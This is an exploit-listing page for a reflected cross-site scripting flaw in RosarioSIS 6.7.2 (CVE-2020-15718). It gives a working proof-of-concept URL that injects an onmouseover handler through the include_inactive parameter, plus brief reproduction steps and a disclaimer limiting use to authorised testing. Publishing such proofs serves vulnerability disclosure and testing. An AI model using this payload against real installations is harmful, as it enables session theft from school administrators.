EXPLOIT December 3, 2025 MEDIUM (6.1)

RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)

CVE ID: CVE-2020-15718

Vulnerability Type: Cross-Site Scripting (XSS)

Author: CodeSecLab

Categories: PHP WebApps

RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)

Proof of Concept (PoC)

poc.txt

# Exploit Title: RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15718

Proof Of Concept
http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"


Steps to Reproduce
Log in as an admin user.
Send the request.
Observe the result.

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

Table of Contents

Proof of Concept (PoC)

Security Disclaimer

Share This Exploit